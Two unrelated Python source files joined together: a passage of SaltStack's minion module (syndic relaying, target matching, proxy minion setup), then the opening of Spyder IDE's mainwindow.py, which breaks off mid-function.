self.pub_channel.on_recv(self._handle_payload)
elif self.opts.get('master_type') != 'disable':
log.error('No connection to master found. Scheduled jobs will not run.')
if start:
try:
self.io_loop.start()
if self.restart:
self.destroy()
except (KeyboardInterrupt, RuntimeError): # A RuntimeError can be re-raised by Tornado on shutdown
self.destroy()
def _handle_payload(self, payload):
if payload is not None and payload['enc'] == 'aes':
if self._target_load(payload['load']):
self._handle_decoded_payload(payload['load'])
elif self.opts['zmq_filtering']:
# In the filtering enabled case, we'd like to know when minion sees something it shouldnt
log.trace('Broadcast message received not for this minion, Load: {0}'.format(payload['load']))
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the minion currently has no need.
def _target_load(self, load):
# Verify that the publication is valid
if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
or 'arg' not in load:
return False
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in load:
match_func = getattr(self.matcher,
'{0}_match'.format(load['tgt_type']), None)
if match_func is None:
return False
if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(load['tgt'], delimiter=delimiter):
return False
elif not match_func(load['tgt']):
return False
else:
if not self.matcher.glob_match(load['tgt']):
return False
return True
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if hasattr(self, 'schedule'):
del self.schedule
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
if hasattr(self, 'periodic_callbacks'):
for cb in six.itervalues(self.periodic_callbacks):
cb.stop()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts, **kwargs):
self._syndic_interface = opts.get('interface')
self._syndic = True
# force auth_safemode True because Syndic don't support autorestart
opts['auth_safemode'] = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts, **kwargs)
self.mminion = salt.minion.MasterMinion(opts)
self.jid_forward_cache = set()
self.jids = {}
self.raw_events = []
self.pub_future = None
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# TODO: even do this??
data['to'] = int(data.get('to', self.opts['timeout'])) - 1
# Only forward the command if it didn't originate from ourselves
if data.get('master_id', 0) != self.opts.get('master_id', 1):
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
kwargs = {}
# optionally add a few fields to the publish data
for field in ('master_id', # which master the job came from
'user', # which user ran the job
):
if field in data:
kwargs[field] = data[field]
def timeout_handler(*args):
log.warning('Unable to forward pub data: {0}'.format(args[1]))
return True
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self.local.pub_async(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'],
io_loop=self.io_loop,
callback=lambda _: None,
**kwargs)
def fire_master_syndic_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start',
sync=False,
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
sync=False,
)
# TODO: clean up docs
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
def _process_cmd_socket(self, payload):
if payload is not None and payload['enc'] == 'aes':
log.trace('Handling payload')
self._handle_decoded_payload(payload['load'])
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the syndic currently has no need.
@tornado.gen.coroutine
def _return_pub_multi(self, values):
for value in values:
yield self._return_pub(value,
'_syndic_return',
timeout=self._return_retry_timer(),
sync=False)
@tornado.gen.coroutine
def reconnect(self):
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
master, self.pub_channel = yield self.eval_master(opts=self.opts)
if self.connected:
self.opts['master'] = master
self.pub_channel.on_recv(self._process_cmd_socket)
log.info('Minion is ready to receive requests!')
raise tornado.gen.Return(self)
def destroy(self):
'''
Tear down the syndic minion
'''
# We borrowed the local clients poller so give it back before
# it's destroyed. Reset the local poller reference.
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
if hasattr(self, 'forward_events'):
self.forward_events.stop()
# TODO: need a way of knowing if the syndic connection is busted
class SyndicManager(MinionBase):
'''
Make a MultiMaster syndic minion, this minion will handle relaying jobs and returns from
all minions connected to it to the list of masters it is connected to.
Modes (controlled by `syndic_mode`:
sync: This mode will synchronize all events and publishes from higher level masters
cluster: This mode will only sync job publishes and returns
Note: jobs will be returned best-effort to the requesting master. This also means
(since we are using zmq) that if a job was fired and the master disconnects
between the publish and return, that the return will end up in a zmq buffer
in this Syndic headed to that original master.
In addition, since these classes all seem to use a mix of blocking and non-blocking
calls (with varying timeouts along the way) this daemon does not handle failure well,
it will (under most circumstances) stall the daemon for ~15s trying to forward events
to the down master
'''
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
SYNDIC_EVENT_TIMEOUT = 5
def __init__(self, opts, io_loop=None):
opts['loop_interval'] = 1
super(SyndicManager, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
# sync (old behavior), cluster (only returns and publishes)
self.syndic_mode = self.opts.get('syndic_mode', 'sync')
self.syndic_failover = self.opts.get('syndic_failover', 'random')
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self._has_master = threading.Event()
self.jid_forward_cache = set()
if io_loop is None:
if HAS_ZMQ:
zmq.eventloop.ioloop.install()
self.io_loop = LOOP_CLASS.current()
else:
self.io_loop = io_loop
# List of events
self.raw_events = []
# Dict of rets: {master_id: {event_tag: job_ret, ...}, ...}
self.job_rets = {}
# List of delayed job_rets which was unable to send for some reason and will be resend to
# any available master
self.delayed = []
# Active pub futures: {master_id: (future, [job_ret, ...]), ...}
self.pub_futures = {}
def _spawn_syndics(self):
'''
Spawn all the coroutines which will sign in the syndics
'''
self._syndics = OrderedDict() # mapping of opts['master'] -> syndic
masters = self.opts['master']
if not isinstance(masters, list):
masters = [masters]
for master in masters:
s_opts = copy.copy(self.opts)
s_opts['master'] = master
self._syndics[master] = self._connect_syndic(s_opts)
@tornado.gen.coroutine
def _connect_syndic(self, opts):
'''
Create a syndic, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
while True:
log.debug('Syndic attempting to connect to {0}'.format(opts['master']))
try:
syndic = Syndic(opts,
timeout=self.SYNDIC_CONNECT_TIMEOUT,
safe=False,
io_loop=self.io_loop,
)
yield syndic.connect_master()
# set up the syndic to handle publishes (specifically not event forwarding)
syndic.tune_in_no_block()
# Send an event to the master that the minion is live
syndic.fire_master_syndic_start()
log.info('Syndic successfully connected to {0}'.format(opts['master']))
break
except SaltClientError as exc:
log.error('Error while bringing up syndic for multi-syndic. Is master at {0} responding?'.format(opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except KeyboardInterrupt:
raise
except: # pylint: disable=W0702
log.critical('Unexpected error while connecting to {0}'.format(opts['master']), exc_info=True)
raise tornado.gen.Return(syndic)
def _mark_master_dead(self, master):
'''
Mark a master as dead. This will start the sign-in routine
'''
# if its connected, mark it dead
if self._syndics[master].done():
syndic = self._syndics[master].result() # pylint: disable=no-member
self._syndics[master] = syndic.reconnect()
else:
log.info('Attempting to mark {0} as dead, although it is already marked dead'.format(master)) # TODO: debug?
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
Wrapper to call a given func on a syndic, best effort to get the one you asked for
'''
success = False
if kwargs is None:
kwargs = {}
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error('Unable to call {0} on {1}, that syndic is not connected'.format(func, master))
continue
try:
getattr(syndic_future.result(), func)(*args, **kwargs)
success = True
if self.opts['syndic_forward_all_events']:
continue
return
except SaltClientError:
log.error('Unable to call {0} on {1}, trying another...'.format(func, master))
self._mark_master_dead(master)
continue
if not success:
log.critical('Unable to call {0} on any masters!'.format(func))
def _return_pub_syndic(self, values, master_id=None):
'''
Wrapper to call the '_return_pub_multi' a syndic, best effort to get the one you asked for
'''
success = False
func = '_return_pub_multi'
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error('Unable to call {0} on {1}, that syndic is not connected'.format(func, master))
continue
future, data = self.pub_futures.get(master, (None, None))
if future is not None:
if not future.done():
if master == master_id:
# Targeted master previous send not done yet, call again later
return False
else:
# Fallback master is busy, try the next one
continue
elif future.exception():
# Previous execution on this master returned an error
log.error('Unable to call {0} on {1}, trying another...'.format(func, master))
self._mark_master_dead(master)
del self.pub_futures[master]
# Add not sent data to the delayed list and try the next master
self.delayed.extend(data)
continue
future = getattr(syndic_future.result(), func)(values)
self.pub_futures[master] = (future, values)
success = True
if self.opts['syndic_forward_all_events']:
continue
break
return success
def iter_master_options(self, master_id=None):
'''
Iterate (in order) over your options for master
'''
masters = list(self._syndics.keys())
if self.opts['syndic_failover'] == 'random':
shuffle(masters)
if master_id not in self._syndics:
master_id = masters.pop(0)
else:
masters.remove(master_id)
while True:
yield master_id, self._syndics[master_id]
if len(masters) == 0:
break
master_id = masters.pop(0)
def _reset_event_aggregation(self):
self.job_rets = {}
self.raw_events = []
def reconnect_event_bus(self, something):
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
self._spawn_syndics()
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
self.local.event.subscribe('')
log.debug('SyndicManager \'{0}\' trying to tune in'.format(self.opts['id']))
# register the event sub to the poller
self.job_rets = {}
self.raw_events = []
self._reset_event_aggregation()
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
io_loop=self.io_loop)
self.forward_events.start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
self.io_loop.start()
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
log.trace('Got event {0}'.format(mtag)) # pylint: disable=no-member
tag_parts = mtag.split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in data:
if 'jid' not in data:
# Not a job return
return
if self.syndic_mode == 'cluster' and data.get('master_id', 0) == self.opts.get('master_id', 1):
log.debug('Return received with matching master_id, not forwarding')
return
master = data.get('master_id')
jdict = self.job_rets.setdefault(master, {}).setdefault(mtag, {})
if not jdict:
jdict['__fun__'] = data.get('fun')
jdict['__jid__'] = data['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if data['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](data['jid'])
)
self.jid_forward_cache.add(data['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if master is not None:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = master
ret = {}
for key in 'return', 'retcode', 'success':
if key in data:
ret[key] = data[key]
jdict[data['id']] = ret
else:
# TODO: config to forward these? If so we'll have to keep track of who
# has seen them
# if we are the top level masters-- don't forward all the minion events
if self.syndic_mode == 'sync':
# Add generic event aggregation here
if 'retcode' not in data:
self.raw_events.append({'data': data, 'tag': mtag})
def _forward_events(self):
log.trace('Forwarding events') # pylint: disable=no-member
if self.raw_events:
events = self.raw_events
self.raw_events = []
self._call_syndic('_fire_master',
kwargs={'events': events,
'pretag': tagify(self.opts['id'], base='syndic'),
'timeout': self.SYNDIC_EVENT_TIMEOUT,
'sync': False,
},
)
if self.delayed:
res = self._return_pub_syndic(self.delayed)
if res:
self.delayed = []
for master in list(six.iterkeys(self.job_rets)):
values = self.job_rets[master].values()
res = self._return_pub_syndic(values, master_id=master)
if res:
del self.job_rets[master]
class Matcher(object):
'''
Use to return the value for matching calls from the master
'''
def __init__(self, opts, functions=None):
self.opts = opts
self.functions = functions
def confirm_top(self, match, data, nodegroups=None):
'''
Takes the data passed to a top file environment and determines if the
data matches this minion
'''
matcher = 'compound'
if not data:
log.error('Received bad data when setting the match from the top '
'file')
return False
for item in data:
if isinstance(item, dict):
if 'match' in item:
matcher = item['match']
if hasattr(self, matcher + '_match'):
funcname = '{0}_match'.format(matcher)
if matcher == 'nodegroup':
return getattr(self, funcname)(match, nodegroups)
return getattr(self, funcname)(match)
else:
log.error('Attempting to match with unknown matcher: {0}'.format(
matcher
))
return False
def glob_match(self, tgt):
'''
Returns true if the passed glob matches the id
'''
if not isinstance(tgt, six.string_types):
return False
return fnmatch.fnmatch(self.opts['id'], tgt)
def pcre_match(self, tgt):
'''
Returns true if the passed pcre regex matches
'''
return bool(re.match(tgt, self.opts['id']))
def list_match(self, tgt):
'''
Determines if this host is on the list
'''
if isinstance(tgt, six.string_types):
tgt = tgt.split(',')
return bool(self.opts['id'] in tgt)
def grain_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the grains glob match
'''
log.debug('grains target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['grains'], tgt, delimiter=delimiter
)
def grain_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Matches a grain based on regex
'''
log.debug('grains pcre target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains pcre match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['grains'], tgt,
delimiter=delimiter, regex_match=True)
def data_match(self, tgt):
'''
Match based on the local data store on the minion
'''
if self.functions is None:
utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=utils)
comps = tgt.split(':')
if len(comps) < 2:
return False
val = self.functions['data.getval'](comps[0])
if val is None:
# The value is not defined
return False
if isinstance(val, list):
# We are matching a single component to a single list member
for member in val:
if fnmatch.fnmatch(str(member).lower(), comps[1].lower()):
return True
return False
if isinstance(val, dict):
if comps[1] in val:
return True
return False
return bool(fnmatch.fnmatch(
val,
comps[1],
))
def pillar_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar glob match
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter
)
def pillar_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar pcre match
'''
log.debug('pillar PCRE target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar PCRE match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter, regex_match=True
)
def pillar_exact_match(self, tgt, delimiter=':'):
'''
Reads in the pillar match, no globbing, no PCRE
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['pillar'],
tgt,
delimiter=delimiter,
exact_match=True)
def ipcidr_match(self, tgt):
'''
Matches based on IP address or CIDR notation
'''
try:
# Target is an address?
tgt = ipaddress.ip_address(tgt)
except: # pylint: disable=bare-except
try:
# Target is a network?
tgt = ipaddress.ip_network(tgt)
except: # pylint: disable=bare-except
log.error('Invalid IP/CIDR target: {0}'.format(tgt))
return []
proto = 'ipv{0}'.format(tgt.version)
grains = self.opts['grains']
if proto not in grains:
match = False
elif isinstance(tgt, (ipaddress.IPv4Address, ipaddress.IPv6Address)):
match = str(tgt) in grains[proto]
else:
match = salt.utils.network.in_subnet(tgt, grains[proto])
return match
def range_match(self, tgt):
'''
Matches based on range cluster
'''
if HAS_RANGE:
range_ = seco.range.Range(self.opts['range_server'])
try:
return self.opts['grains']['fqdn'] in range_.expand(tgt)
except seco.range.RangeException as exc:
log.debug('Range exception in compound match: {0}'.format(exc))
return False
return False
def compound_match(self, tgt):
'''
Runs the compound target check
'''
if not isinstance(tgt, six.string_types) and not isinstance(tgt, (list, tuple)):
log.error('Compound target received that is neither string, list nor tuple')
return False
log.debug('compound_match: {0} ? {1}'.format(self.opts['id'], tgt))
ref = {'G': 'grain',
'P': 'grain_pcre',
'I': 'pillar',
'J': 'pillar_pcre',
'L': 'list',
'N': None, # Nodegroups should already be expanded
'S': 'ipcidr',
'E': 'pcre'}
if HAS_RANGE:
ref['R'] = 'range'
results = []
opers = ['and', 'or', 'not', '(', ')']
if isinstance(tgt, six.string_types):
words = tgt.split()
else:
words = tgt
for word in words:
target_info = salt.utils.minions.parse_target(word)
# Easy check first
if word in opers:
if results:
if results[-1] == '(' and word in ('and', 'or'):
log.error('Invalid beginning operator after "(": {0}'.format(word))
return False
if word == 'not':
if not results[-1] in ('and', 'or', '('):
results.append('and')
results.append(word)
else:
# seq start with binary oper, fail
if word not in ['(', 'not']:
log.error('Invalid beginning operator: {0}'.format(word))
return False
results.append(word)
elif target_info and target_info['engine']:
if 'N' == target_info['engine']:
# Nodegroups should already be expanded/resolved to other engines
log.error('Detected nodegroup expansion failure of "{0}"'.format(word))
return False
engine = ref.get(target_info['engine'])
if not engine:
# If an unknown engine is called at any time, fail out
log.error('Unrecognized target engine "{0}" for'
' target expression "{1}"'.format(
target_info['engine'],
word,
)
)
return False
engine_args = [target_info['pattern']]
engine_kwargs = {}
if target_info['delimiter']:
engine_kwargs['delimiter'] = target_info['delimiter']
results.append(
str(getattr(self, '{0}_match'.format(engine))(*engine_args, **engine_kwargs))
)
else:
# The match is not explicitly defined, evaluate it as a glob
results.append(str(self.glob_match(word)))
results = ' '.join(results)
log.debug('compound_match {0} ? "{1}" => "{2}"'.format(self.opts['id'], tgt, results))
try:
return eval(results) # pylint: disable=W0123
except Exception:
log.error('Invalid compound target: {0} for results: {1}'.format(tgt, results))
return False
return False
def nodegroup_match(self, tgt, nodegroups):
'''
This is a compatibility matcher and is NOT called when using
nodegroups for remote execution, but is called when the nodegroups
matcher is used in states
'''
if tgt in nodegroups:
return self.compound_match(
salt.utils.minions.nodegroup_comp(tgt, nodegroups)
)
return False
class ProxyMinionManager(MinionManager):
'''
Create the multi-minion interface but for proxy minions
'''
def _create_minion_object(self, opts, timeout, safe,
io_loop=None, loaded_base_name=None,
jid_queue=None):
'''
Helper function to return the correct type of object
'''
return ProxyMinion(opts,
timeout,
safe,
io_loop=io_loop,
loaded_base_name=loaded_base_name,
jid_queue=jid_queue)
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
If this function is changed, please check Minion._post_master_init
to see if those changes need to be propagated.
ProxyMinions need a significantly different post master setup,
which is why the differences are not factored out into separate helper
functions.
'''
log.debug("subclassed _post_master_init")
if self.connected:
self.opts['master'] = master
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
saltenv=self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if 'proxy' not in self.opts['pillar'] and 'proxy' not in self.opts:
errmsg = 'No proxy key found in pillar or opts for id '+self.opts['id']+'. '+\
'Check your pillar/opts configuration and contents. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=-1, msg=errmsg)
if 'proxy' not in self.opts:
self.opts['proxy'] = self.opts['pillar']['proxy']
fq_proxyname = self.opts['proxy']['proxytype']
# Need to load the modules so they get all the dunder variables
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
# we can then sync any proxymodules down from the master
# we do a sync_all here in case proxy code was installed by
# SPM or was manually placed in /srv/salt/_modules etc.
self.functions['saltutil.sync_all'](saltenv=self.opts['environment'])
# Then load the proxy module
self.proxy = salt.loader.proxy(self.opts)
# And re-load the modules so the __proxy__ variable gets injected
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.functions.pack['__proxy__'] = self.proxy
self.proxy.pack['__salt__'] = self.functions
self.proxy.pack['__ret__'] = self.returners
self.proxy.pack['__pillar__'] = self.opts['pillar']
# Start engines here instead of in the Minion superclass __init__
# This is because we need to inject the __proxy__ variable but
# it is not setup until now.
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager, proxy=self.proxy)
if ('{0}.init'.format(fq_proxyname) not in self.proxy
or '{0}.shutdown'.format(fq_proxyname) not in self.proxy):
errmsg = 'Proxymodule {0} is missing an init() or a shutdown() or both. '.format(fq_proxyname)+\
'Check your proxymodule. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=-1, msg=errmsg)
proxy_init_fn = self.proxy[fq_proxyname+'.init']
proxy_init_fn(self.opts)
self.opts['grains'] = salt.loader.grains(self.opts, proxy=self.proxy)
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0):
self.schedule.add_job({
master_event(type='alive', master=self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
master_event(type='failback'):
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job(master_event(type='failback'), persist=True)
else:
self.schedule.delete_job(master_event(type='alive', master=self.opts['master']), persist=True)
self.schedule.delete_job(master_event(type='failback'), persist=True)
# Sync the grains here so the proxy can communicate them to the master
self.functions['saltutil.sync_grains'](saltenv=self.opts['environment'])
self.grains_cache = self.opts['grains']
self.ready = True
|
mainwindow.py
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
Spyder, the Scientific Python Development Environment
=====================================================
Developped and maintained by the Spyder Project
Contributors
Copyright © Spyder Project Contributors
Licensed under the terms of the MIT License
(see spyder/__init__.py for details)
"""
# =============================================================================
# Stdlib imports
# =============================================================================
from __future__ import print_function
import errno
import gc
import logging
import os
import os.path as osp
import re
import signal
import socket
import subprocess
import sys
import threading
import traceback
import importlib
logger = logging.getLogger(__name__)
#==============================================================================
# Keeping a reference to the original sys.exit before patching it
#==============================================================================
ORIGINAL_SYS_EXIT = sys.exit
#==============================================================================
# Check requirements
#==============================================================================
from spyder import requirements
requirements.check_path()
requirements.check_qt()
requirements.check_spyder_kernels()
#==============================================================================
# Windows only: support for hiding console window when started with python.exe
#==============================================================================
set_attached_console_visible = None
is_attached_console_visible = None
set_windows_appusermodelid = None
if os.name == 'nt':
from spyder.utils.windows import (set_attached_console_visible,
is_attached_console_visible,
set_windows_appusermodelid)
#==============================================================================
# Qt imports
#==============================================================================
from qtpy import API, PYQT5
from qtpy.compat import from_qvariant
from qtpy.QtCore import (QByteArray, QCoreApplication, QPoint, QSize, Qt,
QThread, QTimer, QUrl, Signal, Slot,
qInstallMessageHandler)
from qtpy.QtGui import QColor, QDesktopServices, QIcon, QKeySequence, QPixmap
from qtpy.QtWidgets import (QAction, QApplication, QDockWidget, QMainWindow,
QMenu, QMessageBox, QShortcut, QSplashScreen,
QStyleFactory, QWidget, QDesktopWidget)
# Avoid a "Cannot mix incompatible Qt library" error on Windows platforms
from qtpy import QtSvg # analysis:ignore
# Avoid a bug in Qt: https://bugreports.qt.io/browse/QTBUG-46720
from qtpy import QtWebEngineWidgets # analysis:ignore
# For issue 7447
try:
from qtpy.QtQuick import QQuickWindow, QSGRendererInterface
except Exception:
QQuickWindow = QSGRendererInterface = None
# To catch font errors in QtAwesome
from qtawesome.iconic_font import FontError
#==============================================================================
# Proper high DPI scaling is available in Qt >= 5.6.0. This attibute must
# be set before creating the application.
#==============================================================================
from spyder.config.main import CONF
if hasattr(Qt, 'AA_EnableHighDpiScaling'):
QCoreApplication.setAttribute(Qt.AA_EnableHighDpiScaling,
CONF.get('main', 'high_dpi_scaling'))
#==============================================================================
# Create our QApplication instance here because it's needed to render the
# splash screen created below
#==============================================================================
from spyder.utils.qthelpers import qapplication, MENU_SEPARATOR
from spyder.config.base import get_image_path
MAIN_APP = qapplication()
if PYQT5:
APP_ICON = QIcon(get_image_path("spyder.svg"))
else:
APP_ICON = QIcon(get_image_path("spyder.png"))
MAIN_APP.setWindowIcon(APP_ICON)
#==============================================================================
# Create splash screen out of MainWindow to reduce perceived startup time.
#==============================================================================
from spyder.config.base import _, get_image_path, DEV, running_under_pytest
if not running_under_pytest():
SPLASH = QSplashScreen(QPixmap(get_image_path('splash.svg')))
SPLASH_FONT = SPLASH.font()
SPLASH_FONT.setPixelSize(10)
SPLASH.setFont(SPLASH_FONT)
SPLASH.show()
SPLASH.showMessage(_("Initializing..."), Qt.AlignBottom | Qt.AlignCenter |
Qt.AlignAbsolute, QColor(Qt.white))
QApplication.processEvents()
else:
SPLASH = None
#==============================================================================
# Local utility imports
#==============================================================================
from spyder import (__version__, __project_url__, __forum_url__,
__trouble_url__, __website_url__, get_versions)
from spyder.config.base import (get_conf_path, get_module_source_path, STDERR,
get_debug_level, MAC_APP_NAME, get_home_dir,
running_in_mac_app, get_module_path,
reset_config_files)
from spyder.config.main import OPEN_FILES_PORT
from spyder.config.utils import IMPORT_EXT, is_gtk_desktop
from spyder.app.cli_options import get_options
from spyder import dependencies
from spyder.py3compat import (is_text_string, to_text_string,
PY3, qbytearray_to_str, configparser as cp)
from spyder.utils import encoding, programs
from spyder.utils import icon_manager as ima
from spyder.utils.programs import is_module_installed
from spyder.utils.misc import select_port, getcwd_or_home, get_python_executable
from spyder.plugins.help.utils.sphinxify import CSS_PATH, DARK_CSS_PATH
from spyder.config.gui import is_dark_font_color
#==============================================================================
# Local gui imports
#==============================================================================
# NOTE: Move (if possible) import's of widgets and plugins exactly where they
# are needed in MainWindow to speed up perceived startup time (i.e. the time
# from clicking the Spyder icon to showing the splash screen).
try:
from spyder.utils.environ import WinUserEnvDialog
except ImportError:
WinUserEnvDialog = None # analysis:ignore
from spyder.utils.qthelpers import (create_action, add_actions, get_icon,
add_shortcut_to_tooltip,
create_module_bookmark_actions,
create_program_action, DialogManager,
create_python_script_action, file_uri)
from spyder.config.gui import get_shortcut
from spyder.otherplugins import get_spyderplugins_mods
from spyder.app import tour
#==============================================================================
# Third-party library imports
#==============================================================================
import qdarkstyle
#==============================================================================
# Get the cwd before initializing WorkingDirectory, which sets it to the one
# used in the last session
#==============================================================================
CWD = getcwd_or_home()
#==============================================================================
# Utility functions
#==============================================================================
def get_python_doc_path():
"""
Return Python documentation path
(Windows: return the PythonXX.chm path if available)
"""
if os.name == 'nt':
doc_path = osp.join(sys.prefix, "Doc")
if not osp.isdir(doc_path):
return
python_chm = [path for path in os.listdir(doc_path)
if re.match(r"(?i)Python[0-9]{3,6}.chm", path)]
if python_chm:
return file_uri(osp.join(doc_path, python_chm[0]))
else:
vinf = sys.version_info
doc_path = '/usr/share/doc/python%d.%d/html' % (vinf[0], vinf[1])
python_doc = osp.join(doc_path, "index.html")
if osp.isfile(python_doc):
return file_uri(python_doc)
def set_opengl_implementation(option):
"""
Set the OpenGL implementation used by Spyder.
See issue 7447 for the details.
"""
if option == 'software':
QCoreApplication.setAttribute(Qt.AA_UseSoftwareOpenGL)
if QQuickWindow is not None:
